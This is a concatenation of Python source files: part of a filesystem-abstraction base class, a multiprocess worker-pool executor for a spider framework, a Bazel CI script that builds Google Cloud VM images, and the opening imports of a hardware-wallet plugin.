if not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn: bool(wildcard_re.match(fn))
entries = [p for p in entries if wildcard(p)]
if dirs_only:
entries = [p for p in entries if self.isdir(pathjoin(path, p))]
elif files_only:
entries = [p for p in entries if self.isfile(pathjoin(path, p))]
if full:
entries = [pathjoin(path, p) for p in entries]
elif absolute:
entries = [abspath(pathjoin(path, p)) for p in entries]
return entries
def ilistdir(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Generator yielding the files and directories under a given path.
This method behaves identically to :py:meth:`fs.base.FS.listdir` but returns a generator
instead of a list. Depending on the filesystem this may be more
efficient than calling :py:meth:`fs.base.FS.listdir` and iterating over the resulting list.
"""
return iter(self.listdir(path,
wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only))
def ilistdirinfo(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Generator yielding paths and path info under a given path.
This method behaves identically to :py:meth:`~fs.base.listdirinfo` but returns a generator
instead of a list. Depending on the filesystem this may be more
efficient than calling :py:meth:`~fs.base.listdirinfo` and iterating over the resulting
list.
"""
return iter(self.listdirinfo(path,
wildcard,
full,
absolute,
dirs_only,
files_only))
def makedir(self, path, recursive=False, allow_recreate=False):
"""Make a directory on the filesystem.
:param path: path of directory
:param recursive: if True, any intermediate directories will also be created
:type recursive: bool
:param allow_recreate: if True, re-creating a directory won't be an error
:type allow_recreate: bool
:raises `fs.errors.DestinationExistsError`: if the path is already a directory, and allow_recreate is False
:raises `fs.errors.ParentDirectoryMissingError`: if a containing directory is missing and recursive is False
:raises `fs.errors.ResourceInvalidError`: if a path is an existing file
"""
raise UnsupportedError("make directory")
def remove(self, path):
"""Remove a file from the filesystem.
:param path: Path of the resource to remove
:raises `fs.errors.ResourceNotFoundError`: if the path does not exist
:raises `fs.errors.ResourceInvalidError`: if the path is a directory
"""
raise UnsupportedError("remove resource")
def removedir(self, path, recursive=False, force=False):
"""Remove a directory from the filesystem
:param path: path of the directory to remove
:param recursive: if True, empty parent directories will be removed
:type recursive: bool
:param force: if True, any directory contents will be removed
:type force: bool
:raises `fs.errors.ResourceNotFoundError`: if the path does not exist
:raises `fs.errors.ResourceInvalidError`: if the path is not a directory
:raises `fs.errors.DirectoryNotEmptyError`: if the directory is not empty and force is False
"""
raise UnsupportedError("remove directory")
def rename(self, src, dst):
"""Renames a file or directory
:param src: path to rename
:param dst: new name
"""
raise UnsupportedError("rename resource")
@convert_os_errors
def settimes(self, path, accessed_time=None, modified_time=None):
"""Set the accessed time and modified time of a file
:param path: path to a file
:param accessed_time: a datetime object giving the time the file was last accessed (defaults to the current time)
:param modified_time: a datetime object giving the time the file was last modified (defaults to the current time)
"""
sys_path = self.getsyspath(path, allow_none=True)
if sys_path is not None:
now = datetime.datetime.now()
if accessed_time is None:
accessed_time = now
if modified_time is None:
modified_time = now
accessed_time = int(time.mktime(accessed_time.timetuple()))
modified_time = int(time.mktime(modified_time.timetuple()))
os.utime(sys_path, (accessed_time, modified_time))
return True
else:
raise UnsupportedError("settimes")
def getinfo(self, path):
"""Returns information for a path as a dictionary. The exact content of
this dictionary will vary depending on the implementation, but will
likely include a few common values. The following values will be found
in info dictionaries for most implementations:
* "size" - Number of bytes used to store the file or directory
* "created_time" - A datetime object containing the time the resource was created
* "accessed_time" - A datetime object containing the time the resource was last accessed
* "modified_time" - A datetime object containing the time the resource was modified
:param path: a path to retrieve information for
:rtype: dict
"""
raise UnsupportedError("get resource info")
def desc(self, path):
"""Returns short descriptive text regarding a path. Intended mainly as
a debugging aid.
:param path: A path to describe
:rtype: str
"""
if not self.exists(path):
return ''
try:
sys_path = self.getsyspath(path)
except NoSysPathError:
return "No description available"
return sys_path
def getcontents(self, path):
"""Returns the contents of a file as a string.
:param path: A path of file to read
:rtype: str
:returns: file contents
"""
f = None
try:
f = self.open(path, "rb")
contents = f.read()
return contents
finally:
if f is not None:
f.close()
def setcontents(self, path, data, chunk_size=1024*64):
"""A convenience method to create a new file from a string or file-like object
:param path: a path of the file to create
:param data: a string or a file-like object containing the contents for the new file
:param chunk_size: Number of bytes to read in a chunk, if the implementation has to resort to a read / copy loop
"""
if not data:
self.createfile(path)
else:
f = None
try:
f = self.open(path, 'wb')
if hasattr(data, "read"):
read = data.read
write = f.write
chunk = read(chunk_size)
while chunk:
write(chunk)
chunk = read(chunk_size)
else:
f.write(data)
if hasattr(f, 'flush'):
f.flush()
finally:
if f is not None:
f.close()
def setcontents_async(self,
path,
data,
chunk_size=1024*64,
progress_callback=None,
finished_callback=None,
error_callback=None):
"""Create a new file from a string or file-like object asynchronously
This method returns a ``threading.Event`` object. Call the ``wait`` method on the event object
to block until all data has been written, or simply ignore it.
:param path: a path of the file to create
:param data: a string or a file-like object containing the contents for the new file
:param chunk_size: Number of bytes to read and write in a chunk
:param progress_callback: A function that is called periodically
with the number of bytes written.
:param finished_callback: A function that is called when all data has been written
:param error_callback: A function that is called with an exception
object if any error occurs during the copy process.
:returns: An event object that is set when the copy is complete, call
the `wait` method of this object to block until the data is written
"""
if progress_callback is None:
progress_callback = lambda bytes_written:None
def do_setcontents():
try:
f = None
try:
f = self.open(path, 'wb')
progress_callback(0)
if hasattr(data, "read"):
bytes_written = 0
read = data.read
write = f.write
chunk = read(chunk_size)
while chunk:
write(chunk)
bytes_written += len(chunk)
progress_callback(bytes_written)
chunk = read(chunk_size)
else:
f.write(data)
progress_callback(len(data))
if finished_callback is not None:
finished_callback()
finally:
if f is not None:
f.close()
except Exception, e:
if error_callback is not None:
error_callback(e)
finally:
finished_event.set()
finished_event = threading.Event()
threading.Thread(target=do_setcontents).start()
return finished_event
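# Illustrative usage sketch for setcontents_async (the callback names and file paths are
# hypothetical):
#
#   def on_progress(bytes_written):
#       print "wrote %d bytes" % bytes_written
#   def on_error(exc):
#       print "copy failed:", exc
#   event = fs.setcontents_async('backup.bin', open('data.bin', 'rb'),
#                                progress_callback=on_progress,
#                                error_callback=on_error)
#   event.wait()   # block until the background copy has finished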
def createfile(self, path, wipe=False):
"""Creates an empty file if it doesn't exist
:param path: path to the file to create
:param wipe: if True, the contents of the file will be erased
"""
if not wipe and self.isfile(path):
return
f = None
try:
f = self.open(path, 'w')
finally:
if f is not None:
f.close()
def opendir(self, path):
"""Opens a directory and returns a FS object representing its contents.
:param path: path to directory to open
:rtype: an FS object
"""
from fs.wrapfs.subfs import SubFS
if not self.exists(path):
raise ResourceNotFoundError(path)
return SubFS(self, path)
def walk(self,
path="/",
wildcard=None,
dir_wildcard=None,
search="breadth",
ignore_errors=False):
"""Walks a directory tree and yields the root path and contents.
Yields a tuple of the path of each directory and a list of its file
contents.
:param path: root path to start walking
:param wildcard: if given, only return files that match this wildcard
:type wildcard: a string containing a wildcard (e.g. `*.txt`) or a callable that takes the file path and returns a boolean
:param dir_wildcard: if given, only walk directories that match the wildcard
:type dir_wildcard: a string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: a string identifying the method used to walk the directories. There are two such methods:
* ``"breadth"`` yields paths in the top directories first
* ``"depth"`` yields the deepest paths first
:param ignore_errors: ignore any errors reading the directory
"""
def listdir(path, *args, **kwargs):
if ignore_errors:
try:
return self.listdir(path, *args, **kwargs)
except:
return []
else:
return self.listdir(path, *args, **kwargs)
if wildcard is None:
wildcard = lambda f:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn: bool(wildcard_re.match(fn))
if dir_wildcard is None:
dir_wildcard = lambda f:True
elif not callable(dir_wildcard):
dir_wildcard_re = re.compile(fnmatch.translate(dir_wildcard))
dir_wildcard = lambda fn: bool(dir_wildcard_re.match(fn))
if search == "breadth":
dirs = [path]
while dirs:
current_path = dirs.pop()
paths = []
try:
for filename in listdir(current_path):
path = pathjoin(current_path, filename)
if self.isdir(path):
if dir_wildcard(path):
dirs.append(path)
else:
if wildcard(filename):
paths.append(filename)
except ResourceNotFoundError:
# Could happen if another thread / process deletes something whilst we are walking
pass
yield (current_path, paths)
elif search == "depth":
def recurse(recurse_path):
try:
for path in listdir(recurse_path, wildcard=dir_wildcard, full=True, dirs_only=True):
for p in recurse(path):
yield p
except ResourceNotFoundError:
# Could happen if another thread / process deletes something whilst we are walking
pass
yield (recurse_path, listdir(recurse_path, wildcard=wildcard, files_only=True))
for p in recurse(path):
yield p
else:
raise ValueError("Search should be 'breadth' or 'depth'")
def walkfiles(self,
path="/",
wildcard=None,
dir_wildcard=None,
search="breadth",
ignore_errors=False ):
"""Like the 'walk' method, but just yields file paths.
:param path: root path to start walking
:param wildcard: if given, only return files that match this wildcard
:type wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the file path and returns a boolean
:param dir_wildcard: if given, only walk directories that match the wildcard
:type dir_wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: same as walk method
:param ignore_errors: ignore any errors reading the directory
"""
for path, files in self.walk(path, wildcard=wildcard, dir_wildcard=dir_wildcard, search=search, ignore_errors=ignore_errors):
for f in files:
yield pathjoin(path, f)
def walkdirs(self,
path="/",
wildcard=None,
search="breadth",
ignore_errors=False):
"""Like the 'walk' method but yields directories.
:param path: root path to start walking
:param wildcard: if given, only return directories that match this wildcard
:type wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: same as the walk method
:param ignore_errors: ignore any errors reading the directory
"""
for p, _files in self.walk(path, dir_wildcard=wildcard, search=search, ignore_errors=ignore_errors):
yield p
def getsize(self, path):
"""Returns the size (in bytes) of a resource.
:param path: a path to the resource
:rtype: integer
:returns: the size of the file
"""
info = self.getinfo(path)
size = info.get('size', None)
if size is None:
raise OperationFailedError("get size of resource", path)
return size
def copy(self, src, dst, overwrite=False, chunk_size=1024*64):
"""Copies a file from src to dst.
:param src: the source path
:param dst: the destination path
        :param overwrite: if True, an existing file at the destination may be
            overwritten; if False, a DestinationExistsError will be raised.
:param chunk_size: size of chunks to use if a simple copy is required
(defaults to 64K).
"""
if not self.isfile(src):
if self.isdir(src):
raise ResourceInvalidError(src,msg="Source is not a file: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
if src_syspath is not None and dst_syspath is not None:
self._shutil_copyfile(src_syspath, dst_syspath)
else:
src_file = None
try:
src_file = self.open(src, "rb")
self.setcontents(dst, src_file, chunk_size=chunk_size)
except ResourceNotFoundError:
if self.exists(src) and not self.exists(dirname(dst)):
raise ParentDirectoryMissingError(dst)
finally:
if src_file is not None:
src_file.close()
@classmethod
@convert_os_errors
def _shutil_copyfile(cls, src_syspath, dst_syspath):
try:
shutil.copyfile(src_syspath, dst_syspath)
except IOError, e:
# shutil reports ENOENT when a parent directory is missing
if getattr(e,"errno",None) == 2:
if not os.path.exists(dirname(dst_syspath)):
raise ParentDirectoryMissingError(dst_syspath)
raise
@classmethod
@convert_os_errors
def _shutil_movefile(cls, src_syspath, dst_syspath):
shutil.move(src_syspath, dst_syspath)
def move(self, src, dst, overwrite=False, chunk_size=16384):
"""moves a file from one location to another.
:param src: source path
:param dst: destination path
        :param overwrite: if True, an existing file at the destination path will be
            silently overwritten; if False, a DestinationExistsError will be raised
        :type overwrite: bool
:param chunk_size: Size of chunks to use when copying, if a simple copy
is required
:type chunk_size: integer
"""
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
# Try to do an os-level rename if possible.
# Otherwise, fall back to copy-and-remove.
if src_syspath is not None and dst_syspath is not None:
if not os.path.isfile(src_syspath):
if os.path.isdir(src_syspath):
raise ResourceInvalidError(src, msg="Source is not a file: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and os.path.exists(dst_syspath):
raise DestinationExistsError(dst)
try:
os.rename(src_syspath, dst_syspath)
return
except OSError:
pass
self.copy(src, dst, overwrite=overwrite, chunk_size=chunk_size)
self.remove(src)
def movedir(self, src, dst, overwrite=False, ignore_errors=False, chunk_size=16384):
"""moves a directory from one location to another.
:param src: source directory path
:param dst: destination directory path
:param overwrite: if True then any existing files in the destination
directory will be overwritten
:param ignore_errors: if True then this method will ignore FSError
exceptions when moving files
:param chunk_size: size of chunks to use when copying, if a simple copy
is required
"""
if not self.isdir(src):
if self.isfile(src):
raise ResourceInvalidError(src, msg="Source is not a directory: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
if src_syspath is not None and dst_syspath is not None:
try:
os.rename(src_syspath,dst_syspath)
return
except OSError:
pass
def movefile_noerrors(src, dst, **kwargs):
try:
return self.move(src, dst, **kwargs)
except FSError:
return
if ignore_errors:
movefile = movefile_noerrors
else:
movefile = self.move
src = abspath(src)
dst = abspath(dst)
if dst:
self.makedir(dst, allow_recreate=overwrite)
for dirname, filenames in self.walk(src, search="depth"):
dst_dirname = relpath(frombase(src, abspath(dirname)))
dst_dirpath = pathjoin(dst, dst_dirname)
self.makedir(dst_dirpath, allow_recreate=True, recursive=True)
for filename in filenames:
src_filename = pathjoin(dirname, filename)
dst_filename = pathjoin(dst_dirpath, filename)
movefile(src_filename, dst_filename, overwrite=overwrite, chunk_size=chunk_size)
self.removedir(dirname)
def copydir(self, src, dst, overwrite=False, ignore_errors=False, chunk_size=16384):
"""copies a directory from one location to another.
:param src: source directory path
:param dst: destination directory path
:param overwrite: if True then any existing files in the destination
directory will be overwritten
:type overwrite: bool
:param ignore_errors: if True, exceptions when copying will be ignored
:type ignore_errors: bool
:param chunk_size: size of chunks to use when copying, if a simple copy
is required (defaults to 16K)
"""
if not self.isdir(src):
raise ResourceInvalidError(src, msg="Source is not a directory: %(path)s")
def copyfile_noerrors(src, dst, **kwargs):
try:
return self.copy(src, dst, **kwargs)
except FSError:
return
if ignore_errors:
copyfile = copyfile_noerrors
else:
copyfile = self.copy
src = abspath(src)
dst = abspath(dst)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
if dst:
self.makedir(dst, allow_recreate=overwrite)
for dirname, filenames in self.walk(src):
dst_dirname = relpath(frombase(src, abspath(dirname)))
dst_dirpath = pathjoin(dst, dst_dirname)
self.makedir(dst_dirpath, allow_recreate=True, recursive=True)
for filename in filenames:
src_filename = pathjoin(dirname, filename)
dst_filename = pathjoin(dst_dirpath, filename)
copyfile(src_filename, dst_filename, overwrite=overwrite, chunk_size=chunk_size)
def isdirempty(self, path):
"""Check if a directory is empty (contains no files or sub-directories)
:param path: a directory path
:rtype: bool
"""
path = normpath(path)
iter_dir = iter(self.listdir(path))
try:
iter_dir.next()
except StopIteration:
return True
return False
def makeopendir(self, path, recursive=False):
"""makes a directory (if it doesn't exist) and returns an FS object for
the newly created directory.
:param path: path to the new directory
:param recursive: if True any intermediate directories will be created
"""
self.makedir(path, allow_recreate=True, recursive=recursive)
dir_fs = self.opendir(path)
return dir_fs
def printtree(self, max_levels=5):
"""Prints a tree structure of the FS object to the console
        :param max_levels: the maximum depth of sub-directories to display,
            defaults to 5. Set to None for no limit
"""
from fs.utils import print_fs
print_fs(self, max_levels=max_levels)
tree = printtree
def browse(self, hide_dotfiles=False):
"""Displays the FS tree in a graphical window (requires wxPython)
:param hide_dotfiles: If True, files and folders that begin with a dot will be hidden
"""
from fs.browsewin import browse
browse(self, hide_dotfiles)
def getmmap(self, path, read_only=False, copy=False):
"""Returns a mmap object for this path.
See http://docs.python.org/library/mmap.html for more details on the mmap module.
:param path: A path on this filesystem
:param read_only: If True, the mmap may not be modified
        :param copy: if True, the mmap is opened copy-on-write and changes won't be written back to the file
:raises `fs.errors.NoMMapError`: Only paths that have a syspath can be opened as a mmap
"""
syspath = self.getsyspath(path, allow_none=True)
if syspath is None:
raise NoMMapError(path)
try:
import mmap
except ImportError:
raise NoMMapError(msg="mmap not supported")
if read_only:
f = open(syspath, 'rb')
access = mmap.ACCESS_READ
else:
if copy:
f = open(syspath, 'rb')
access = mmap.ACCESS_COPY
else:
f = open(syspath, 'r+b')
access = mmap.ACCESS_WRITE
m = mmap.mmap(f.fileno(), 0, access=access)
return m
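# --- Illustrative usage sketch (not part of the FS class above) ---------------
# A minimal example combining walk() and copy(). `some_fs` is assumed to be a
# concrete FS implementation (e.g. an OSFS opened elsewhere) and the "/backup"
# destination directory is purely hypothetical; pathjoin is the path helper this
# module already imports and uses above.
def _example_backup_text_files(some_fs, dst_dir="/backup"):
    """Copy every *.txt file found under the root of `some_fs` into `dst_dir`."""
    some_fs.makedir(dst_dir, allow_recreate=True, recursive=True)
    for dirpath, filenames in some_fs.walk("/", wildcard="*.txt", search="breadth"):
        for filename in filenames:
            some_fs.copy(pathjoin(dirpath, filename),
                         pathjoin(dst_dir, filename),
                         overwrite=True)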
def flags_to_mode(flags):
"""Convert an os.O_* flag bitmask into an FS mode string."""
if flags & os.O_WRONLY:
if flags & os.O_TRUNC:
mode = "w"
elif flags & os.O_APPEND:
mode = "a"
else:
mode = "r+"
elif flags & os.O_RDWR:
if flags & os.O_TRUNC:
mode = "w+"
elif flags & os.O_APPEND:
mode = "a+"
else:
mode = "r+"
else:
mode = "r"
if flags & os.O_EXCL:
mode += "x"
return mode
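# Illustrative sketch of the mapping implemented by flags_to_mode() above; the
# assertions simply restate its branches for common os.O_* combinations.
def _example_flags_to_mode():
    import os
    assert flags_to_mode(os.O_RDONLY) == "r"
    assert flags_to_mode(os.O_WRONLY | os.O_TRUNC) == "w"
    assert flags_to_mode(os.O_WRONLY | os.O_APPEND) == "a"
    assert flags_to_mode(os.O_RDWR | os.O_APPEND) == "a+"
    # O_EXCL appends an "x" to whichever base mode was selected
    assert flags_to_mode(os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_TRUNC) == "wx"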
|
process_executor.py
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @author: XYZ
# @file: process_executor.py
# @time: 2021.01.28 13:12
# @desc:
import time
import logging
import threading
from abc import ABCMeta, abstractmethod
from multiprocessing import Process, JoinableQueue
import nspider.utilities.constant as const
from nspider.core.log import MultiprocessLog
class ProcessExecutor(Process, metaclass=ABCMeta):
def __init__(self,
name,
shared_memory_handler,
CORE_POOL_SIZE: int,
MAX_POOL_SIZE: int,
KEEP_ALIVE_TIME: float,
                 RETRY_NUM: int,
worker_class,
TPS=-1):
super().__init__()
self.__stop_signal = False
self.__pause_signal = False
self.name = name
self.shared_memory_handler = shared_memory_handler
self.TPS = TPS
        self.RETRY_NUM = RETRY_NUM
self.CORE_POOL_SIZE = CORE_POOL_SIZE
self.MAX_POOL_SIZE = MAX_POOL_SIZE
self.KEEP_ALIVE_TIME = KEEP_ALIVE_TIME
self.job_queue = JoinableQueue(self.MAX_POOL_SIZE * 2)
self.worker_class = worker_class
self.workers = {}
self.worker_states = {}
self.__worker_count = 0
self.__init_worker_states()
def __init_worker_states(self):
for i in range(self.MAX_POOL_SIZE):
self.worker_states[str(i)] = const.WORKER_EMPTY
def __get_first_empty_worker_id(self) -> int:
for i in range(self.MAX_POOL_SIZE):
if self.worker_states[str(i)] == const.WORKER_EMPTY:
return i
@property
def pause_signal(self):
return self.__pause_signal
@property
def stop_signal(self):
return self.__stop_signal
@property
def worker_count(self):
count = 0
for k, v in self.worker_states.items():
if v != const.WORKER_EMPTY:
count += 1
return count
@stop_signal.setter
def stop_signal(self, signal: bool):
self.__stop_signal = signal
@pause_signal.setter
def pause_signal(self, signal: bool):
self.__pause_signal = signal
@abstractmethod
def get_job(self) -> object:
raise NotImplementedError
@abstractmethod
    def create_worker(self, worker_class, id_, is_core=True, init_job=None) -> object:
raise NotImplementedError
    def update_worker_state(self, id_, state):
        id_ = str(id_)  # worker slot ids are stored as string keys
        if id_ not in self.worker_states:
            return
        self.worker_states[id_] = state
        if state == const.WORKER_EMPTY:
            self.workers[id_] = None
def __receiver_process(self):
while not self.stop_signal:
if self.pause_signal:
time.sleep(1)
continue
job = self.get_job()
# self.logger.info(self.worker_states)
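            # Pool-growth policy (mirrors the usual thread-pool behaviour): fill
            # up to CORE_POOL_SIZE core workers first, then buffer jobs in
            # job_queue, and only spawn non-core workers (up to MAX_POOL_SIZE)
            # once the queue is full; otherwise the job simply waits in the queue.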
if self.worker_count < self.CORE_POOL_SIZE:
core_worker = self.create_worker(self.worker_class, str(self.__get_first_empty_worker_id()), is_core=True, init_job=job)
self.workers[str(core_worker.id)] = core_worker
self.update_worker_state(core_worker.id, const.WORKER_INIT)
core_worker.start()
elif self.job_queue.full():
if self.worker_count < self.MAX_POOL_SIZE:
non_core_worker = self.create_worker(self.worker_class, str(self.__get_first_empty_worker_id()), is_core=False, init_job=job)
self.workers[str(non_core_worker.id)]= non_core_worker
self.update_worker_state(non_core_worker.id, const.WORKER_INIT)
non_core_worker.start()
else:
self.job_queue.put(job)
else:
self.job_queue.put(job)
def __init_inner_log(self):
MultiprocessLog.worker_configurer(self.shared_memory_handler.log_message_queue)
self.logger = logging.getLogger(self.name)
def ran(self):
pass
def __init_receiver(self):
self.receiver = threading.Thread(target=self.__receiver_process)
self.receiver.setDaemon(True)
self.receiver.start()
def before_waiting(self):
pass
def __wait_for_thread(self):
self.receiver.join()
def run(self):
self.__init_inner_log()
self.ran()
self.__init_receiver()
self.before_waiting()
self.__wait_for_thread()
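
# --- Illustrative sketch (not part of nspider) ---------------------------------
# A minimal concrete executor showing how the two abstract hooks are typically
# filled in. The request_queue attribute on shared_memory_handler and the
# worker-class constructor signature used below are assumptions for illustration.
class ExampleExecutor(ProcessExecutor):
    def get_job(self) -> object:
        # Block until the shared handler provides the next job (hypothetical API).
        return self.shared_memory_handler.request_queue.get()

    def create_worker(self, worker_class, id_, is_core=True, init_job=None) -> object:
        # Hand the worker its slot id, a reference back to this executor and its
        # first job; is_core decides whether it may exit after KEEP_ALIVE_TIME
        # of idleness (hypothetical constructor).
        return worker_class(id_, executor=self, is_core=is_core, init_job=init_job)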
|
create_images.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import json
import os
import queue
import subprocess
import sys
import tempfile
import threading
import gcloud
import gcloud_utils
DEBUG = False
IMAGE_CREATION_VMS = {
# Find the newest FreeBSD 11 image via:
# gcloud compute images list --project freebsd-org-cloud-dev \
# --no-standard-images
# ('bk-freebsd11',): {
# 'source_image': 'https://www.googleapis.com/compute/v1/projects/freebsd-org-cloud-dev/global/images/freebsd-11-1-stable-amd64-2017-12-28',
# 'scripts': [
# 'setup-freebsd.sh',
# 'install-buildkite-agent.sh'
# ]
# },
"bk-docker": {
"project": "bazel-untrusted",
"zone": "us-central1-a",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1904",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-testing-docker": {
"project": "bazel-untrusted",
"zone": "us-central1-a",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1904",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-trusted-docker": {
"project": "bazel-public",
"zone": "us-central1-a",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1904",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-windows-java8": {
"project": "bazel-untrusted",
"zone": "us-central1-a",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1809-core",
"setup_script": "setup-windows.ps1",
},
"bk-testing-windows-java8": {
"project": "bazel-untrusted",
"zone": "us-central1-a",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1809-core",
"setup_script": "setup-windows.ps1",
},
"bk-trusted-windows-java8": {
"project": "bazel-public",
"zone": "us-central1-a",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1809-core",
"setup_script": "setup-windows.ps1",
},
"windows-playground": {
"project": "di-cloud-exp",
"zone": "us-central1-a",
"network": "default",
"source_image_project": "windows-cloud",
"source_image_family": "windows-2019",
"setup_script": "setup-windows.ps1",
},
}
WORK_QUEUE = queue.Queue()
def run(args, **kwargs):
return subprocess.run(args, **kwargs)
def preprocess_setup_script(setup_script, is_windows):
output_file = tempfile.mkstemp()[1]
newline = "\r\n" if is_windows else "\n"
with open(output_file, "w", newline=newline) as f:
with open(setup_script, "r") as setup_script_file:
if is_windows:
f.write("$setup_script = @'\n")
f.write(setup_script_file.read() + "\n")
if is_windows:
f.write("'@\n")
f.write('[System.IO.File]::WriteAllLines("c:\\setup.ps1", $setup_script)\n')
return output_file
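# Illustrative sketch: what preprocess_setup_script() produces for a Windows
# image. The script name is one of the setup_script values from IMAGE_CREATION_VMS
# above and is assumed to be present in the working directory; the check only
# looks at the PowerShell here-string wrapper that writes the real script to
# C:\setup.ps1 on the VM.
def _example_preprocess_windows(script="setup-windows.ps1"):
    wrapped_path = preprocess_setup_script(script, is_windows=True)
    try:
        with open(wrapped_path, "r", newline="") as f:
            first_line = f.readline()
        assert first_line == "$setup_script = @'\r\n"
    finally:
        os.remove(wrapped_path)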
def create_instance(instance_name, params):
is_windows = "windows" in instance_name
setup_script = preprocess_setup_script(params["setup_script"], is_windows)
try:
if is_windows:
startup_script = "windows-startup-script-ps1=" + setup_script
else:
startup_script = "startup-script=" + setup_script
if "source_image" in params:
image = {"image": params["source_image"]}
else:
image = {
"image-project": params["source_image_project"],
"image-family": params["source_image_family"],
}
gcloud.create_instance(
instance_name,
project=params["project"],
zone=params["zone"],
machine_type="n1-standard-8",
network=params.get("network", "buildkite"),
metadata_from_file=startup_script,
boot_disk_type="pd-ssd",
boot_disk_size="50GB",
**image,
)
finally:
os.remove(setup_script)
# https://stackoverflow.com/a/25802742
def write_to_clipboard(output):
process = subprocess.Popen("pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE)
process.communicate(output.encode("utf-8"))
def print_windows_instructions(project, zone, instance_name):
tail_start = gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, until="Finished running startup scripts"
)
pw = json.loads(
gcloud.reset_windows_password(
instance_name, format="json", project=project, zone=zone
).stdout
)
rdp_file = tempfile.mkstemp(suffix=".rdp")[1]
with open(rdp_file, "w") as f:
f.write("full address:s:" + pw["ip_address"] + "\n")
f.write("username:s:" + pw["username"] + "\n")
subprocess.run(["open", rdp_file])
write_to_clipboard(pw["password"])
with gcloud.PRINT_LOCK:
print("Use this password to connect to the Windows VM: " + pw["password"])
print("Please run the setup script C:\\setup.ps1 once you're logged in.")
# Wait until the VM reboots once, then open RDP again.
tail_start = gcloud_utils.tail_serial_console(
instance_name,
project=project,
zone=zone,
start=tail_start,
until="Finished running startup scripts",
)
print("Connecting via RDP a second time to finish the setup...")
write_to_clipboard(pw["password"])
run(["open", rdp_file])
return tail_start
def workflow(name, params):
instance_name = "%s-image-%s" % (name, int(datetime.now().timestamp()))
project = params["project"]
zone = params["zone"]
try:
# Create the VM.
create_instance(instance_name, params)
# Wait for the VM to become ready.
gcloud_utils.wait_for_instance(instance_name, project=project, zone=zone, status="RUNNING")
if "windows" in instance_name:
# Wait for VM to be ready, then print setup instructions.
tail_start = print_windows_instructions(project, zone, instance_name)
# Continue printing the serial console until the VM shuts down.
gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, start=tail_start
)
else:
# Continuously print the serial console.
gcloud_utils.tail_serial_console(instance_name, project=project, zone=zone)
# Wait for the VM to completely shutdown.
gcloud_utils.wait_for_instance(
instance_name, project=project, zone=zone, status="TERMINATED"
)
# Create a new image from our VM.
gcloud.create_image(
instance_name,
project=project,
family=name,
source_disk=instance_name,
source_disk_zone=zone,
licenses=params.get("licenses", []),
)
finally:
gcloud.delete_instance(instance_name, project=project, zone=zone)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
workflow(**item)
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
print("Usage: create_images.py {}".format(" ".join(IMAGE_CREATION_VMS.keys())))
return 1
unknown_args = set(argv).difference(IMAGE_CREATION_VMS.keys())
if unknown_args:
print(
"Unknown platforms: {}\nAvailable platforms: {}".format(
", ".join(unknown_args), ", ".join(IMAGE_CREATION_VMS.keys())
)
)
return 1
if subprocess.check_output(["git", "status", "--porcelain"], universal_newlines=True).strip():
print(
"There are pending changes in your Git repository. You have to commit "
"them, before create_images.py can continue.",
file=sys.stderr,
)
return 1
# Put VM creation instructions into the work queue.
for name in argv:
WORK_QUEUE.put({"name": name, "params": IMAGE_CREATION_VMS[name]})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
